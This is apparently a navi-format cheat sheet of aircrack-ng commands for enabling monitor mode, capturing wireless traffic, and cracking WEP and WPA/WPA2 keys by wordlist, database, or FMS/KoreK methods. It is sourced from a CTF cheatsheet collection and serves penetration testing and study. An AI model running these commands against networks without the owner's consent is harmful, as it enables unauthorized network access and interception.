% Wifi Cheat Sheet / wireless - aircrack-ng


# michael <truckiewow>
# Jose Moruno Cadima  <sniferl4bs>
# from here: https://github.com/thezakman/CTF-Heaven/blob/master/Cheatsheets/aircrack-ng
# added to navi by esp0xdeadbeef


# Start Monitor Mode and Save captures
iw dev wlan0 add interface mon0 type monitor
airmon-ng start wlan0 <Chanel>

# packet capture
airodump-ng -c <Chanel> --bssid <MAC_AP> -w aircrack_ng.cap <InterfaceMonitor>

# To crack WEP for a given essid name and store into a file
aircrack-ng -a 1 -e <essid> -l <output_file> aircrack_ng.cap

# To crack WPA/WPA2 from airolib-ng database
aircrack-ng -e <essid> -r <database> aircrack_ng.cap

# To crack WPA/WPA2 from a wordlist
aircrack-ng -e <essid> -w <wordlist> aircrack_ng.cap

# To crack a given bssid
aircrack-ng -b <bssid> -l <output_file> aircrack_ng.cap

# To crack a given bssid using FMS/Korek method
aircrack-ng -K -b <bssid> aircrack_ng.cap

# To crack a given essid (WEP) and display the ASCII of the key
aircrack-ng -e <essid> -s aircrack_ng.cap

# To crack a given essid (WEP) and create a EWSA Project
aircrack-ng -e <essid> -E <EWSA_file> aircrack_ng.cap
